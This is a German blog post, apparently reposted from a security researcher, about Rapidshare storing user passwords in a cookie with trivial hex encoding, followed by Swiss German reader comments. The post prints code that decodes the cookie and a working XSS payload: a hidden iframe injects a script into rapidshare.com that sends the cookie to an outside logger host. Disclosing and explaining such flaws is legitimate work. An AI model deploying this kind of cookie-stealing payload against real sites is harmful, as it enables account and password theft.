Dumm, Dümmer, Rapid$hare
Offenbar ist es ein Kinderspiel, Rapid$hare Accounts zu klauen. Diese Vollidioten speichern ernsthaft das Password in einem Cookie, wie nktpro herausgefunden hat.
In einem Cookie steht dann zum Beispiel „user=12345-%36%37%38%39%30", wobei 12345 der Username und %36%37%38%39%30 das Passwort ist. Sieht verschlüsselt aus, oder? Leider nicht!
Code: cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Also: var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);
Also werden die Buchstaben lediglich in charCode umgewandelt. Nun, das kann man leicht rückgängig machen:
var injection = "«script»(" + (function() {
new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +
escape(document.cookie);
}) + ")()«/scr" + "ipt»"
var iframe = document.body.appendChild(document.createElement("iframe"));
iframe.style.visibility = "hidden";
iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +
encodeURIComponent(injection);
Bingo! Jeder Rapid$hare-user, der eine Seite mit dem oberen Code besucht, ist nun sein Passwort los.
*facepalm*
[via hackademix.net]
Longneck
nei also….
ÜH! hesch gwüsst dass rapidshare schwyzer sin? http://rapidshare.com/imprint.html

rakudave
was am meischte närvt isch allerdings ihri anti-premium politik. nid nur, dass me 5 moll witerleitendi links mues klicke und uf völlig sinnloosi „download-tickets“ mues warte und nur ei moll pro stund cha verbi cho, nei, sit neuschtem hän si au no es captcha wo kei sau cha lääse… *grmbl*



Freidenker
ouch…